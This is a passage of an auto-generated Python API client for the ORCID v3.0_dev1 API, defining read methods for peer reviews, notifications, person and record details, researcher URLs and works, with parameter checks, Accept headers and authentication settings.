raise ValueError("Missing the required parameter `orcid` when calling `view_peer_review`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_peer_review`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/peer-review/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PeerReview',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
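# Note on the Accept header built above: the listed ORCID media types carry
# qs (server-side quality) weights, so the server prefers
# application/vnd.orcid+xml (qs=5) over the +json variants while still
# accepting plain application/xml and application/json.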
def view_peer_review_summary(self, orcid, put_code, **kwargs):
"""
Fetch a Peer Review Summary
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_peer_review_summary(orcid, put_code, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: PeerReviewSummary
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_peer_review_summary_with_http_info(orcid, put_code, **kwargs)
else:
data = self.view_peer_review_summary_with_http_info(orcid, put_code, **kwargs)
return data
def view_peer_review_summary_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch a Peer Review Summary
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_peer_review_summary_with_http_info(orcid, put_code, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: PeerReviewSummary
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_peer_review_summary" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_peer_review_summary`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_peer_review_summary`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/peer-review/summary/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PeerReviewSummary',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_peer_reviews(self, orcid, **kwargs):
"""
Fetch all peer reviews
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_peer_reviews(orcid, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: PeerReviews
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_peer_reviews_with_http_info(orcid, **kwargs)
else:
data = self.view_peer_reviews_with_http_info(orcid, **kwargs)
return data
def view_peer_reviews_with_http_info(self, orcid, **kwargs):
"""
Fetch all peer reviews
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_peer_reviews_with_http_info(orcid, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: PeerReviews
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_peer_reviews" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_peer_reviews`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/peer-reviews'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PeerReviews',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_permission_notification(self, orcid, id, **kwargs):
"""
Fetch a notification by id
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_permission_notification(orcid, id, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param int id: (required)
:return: Notification
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_permission_notification_with_http_info(orcid, id, **kwargs)
else:
data = self.view_permission_notification_with_http_info(orcid, id, **kwargs)
return data
def view_permission_notification_with_http_info(self, orcid, id, **kwargs):
"""
Fetch a notification by id
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_permission_notification_with_http_info(orcid, id, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param int id: (required)
:return: Notification
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_permission_notification" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_permission_notification`")
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `view_permission_notification`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/notification-permission/{id}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_two_legs']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Notification',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
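# Usage sketch: unlike the other reads in this class, this endpoint is
# generated with auth_settings=['orcid_two_legs'], i.e. it expects a
# client-credentials (two-legged) token rather than a user-authorized one.
# The values below are illustrative.
#
#     note = api.view_permission_notification('0000-0002-1825-0097', 42)
#     print(note)   # -> Notification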
def view_person(self, orcid, **kwargs):
"""
Fetch person details
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_person(orcid, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_person_with_http_info(orcid, **kwargs)
else:
data = self.view_person_with_http_info(orcid, **kwargs)
return data
def view_person_with_http_info(self, orcid, **kwargs):
"""
Fetch person details
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_person_with_http_info(orcid, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_person" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_person`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/person'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_personal_details(self, orcid, **kwargs):
"""
Fetch personal details for an ORCID ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_personal_details(orcid, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_personal_details_with_http_info(orcid, **kwargs)
else:
data = self.view_personal_details_with_http_info(orcid, **kwargs)
return data
def view_personal_details_with_http_info(self, orcid, **kwargs):
"""
Fetch personal details for an ORCID ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_personal_details_with_http_info(orcid, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_personal_details" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_personal_details`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/personal-details'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_record(self, orcid, **kwargs):
"""
Fetch record details
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_record(orcid, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_record_with_http_info(orcid, **kwargs)
else:
data = self.view_record_with_http_info(orcid, **kwargs)
return data
def view_record_with_http_info(self, orcid, **kwargs):
"""
Fetch record details
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_record_with_http_info(orcid, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_record" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_record`")
if 'orcid' in params and not re.search('[^/]+', params['orcid']):
raise ValueError("Invalid value for parameter `orcid` when calling `view_record`, must conform to the pattern `/[^/]+/`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}{ignore}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
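# Usage sketch: view_record additionally validates the orcid path parameter
# against the pattern [^/]+ before issuing any request, so an empty string
# fails fast with a client-side ValueError:
#
#     api.view_record('')                               # raises ValueError
#     record = api.view_record('0000-0002-1825-0097')   # placeholder iD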
def view_researcher_url(self, orcid, put_code, **kwargs):
"""
Fetch one researcher url for an ORCID ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_researcher_url(orcid, put_code, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_researcher_url_with_http_info(orcid, put_code, **kwargs)
else:
data = self.view_researcher_url_with_http_info(orcid, put_code, **kwargs)
return data
def view_researcher_url_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch one researcher url for an ORCID ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_researcher_url_with_http_info(orcid, put_code, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_researcher_url" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_researcher_url`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_researcher_url`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/researcher-urls/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_researcher_urls(self, orcid, **kwargs):
"""
Fetch all researcher urls for an ORCID ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_researcher_urls(orcid, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_researcher_urls_with_http_info(orcid, **kwargs)
else:
data = self.view_researcher_urls_with_http_info(orcid, **kwargs)
return data
def view_researcher_urls_with_http_info(self, orcid, **kwargs):
"""
Fetch all researcher urls for an ORCID ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_researcher_urls_with_http_info(orcid, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_researcher_urls" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_researcher_urls`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/researcher-urls'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_specified_works(self, orcid, put_codes, **kwargs):
"""
Fetch specified works
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_specified_works(orcid, put_codes, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_codes: (required)
:return: WorkBulk
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_specified_works_with_http_info(orcid, put_codes, **kwargs)
else:
data = self.view_specified_works_with_http_info(orcid, put_codes, **kwargs)
return data
def view_specified_works_with_http_info(self, orcid, put_codes, **kwargs):
"""
Fetch specified works
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_specified_works_with_http_info(orcid, put_codes, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_codes: (required)
:return: WorkBulk
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_codes']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_specified_works" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_specified_works`")
# verify the required parameter 'put_codes' is set
if ('put_codes' not in params) or (params['put_codes'] is None):
raise ValueError("Missing the required parameter `put_codes` when calling `view_specified_works`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/works/{putCodes}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_codes' in params:
path_params['putCodes'] = params['put_codes']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkBulk',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
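# Usage sketch: `put_codes` is passed through verbatim into the {putCodes}
# path segment (collection_formats is empty), so the caller supplies the
# delimited list itself; the ORCID API conventionally takes comma-separated
# put-codes, and the values below are illustrative.
#
#     bulk = api.view_specified_works('0000-0002-1825-0097', '123,456,789')
#     print(bulk)   # -> WorkBulk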
def view_work(self, orcid, put_code, **kwargs):
"""
Fetch a Work
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_work(orcid, put_code, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: Work
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_work_with_http_info(orcid, put_code, **kwargs)
else:
data = self.view_work_with_http_info(orcid, put_code, **kwargs)
return data
def view_work_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch a Work
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_work_with_http_info(orcid, put_code, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: Work
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_work" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_work`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_work`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/work/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Work',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
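# Usage sketch: calling the _with_http_info variant directly skips the public
# wrapper's _return_http_data_only=True, so under the usual swagger-codegen
# ApiClient contract (assumed, not defined in this module) it yields the full
# (data, status, headers) triple:
#
#     work, status, headers = api.view_work_with_http_info(orcid, put_code)
#     print(status, work)   # e.g. 200 and a Work model instance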
def view_work_summary(self, orcid, put_code, **kwargs):
"""
Fetch a Work Summary
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_work_summary(orcid, put_code, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: WorkSummary
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_work_summary_with_http_info(orcid, put_code, **kwargs)
else:
data = self.view_work_summary_with_http_info(orcid, put_code, **kwargs)
return data
def view_work_summary_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch a Work Summary
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_work_summary_with_http_info(orcid, put_code, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: WorkSummary
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_work_summary" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_work_summary`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_work_summary`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/work/summary/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkSummary',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_works(self, orcid, **kwargs):
"""
Fetch all works
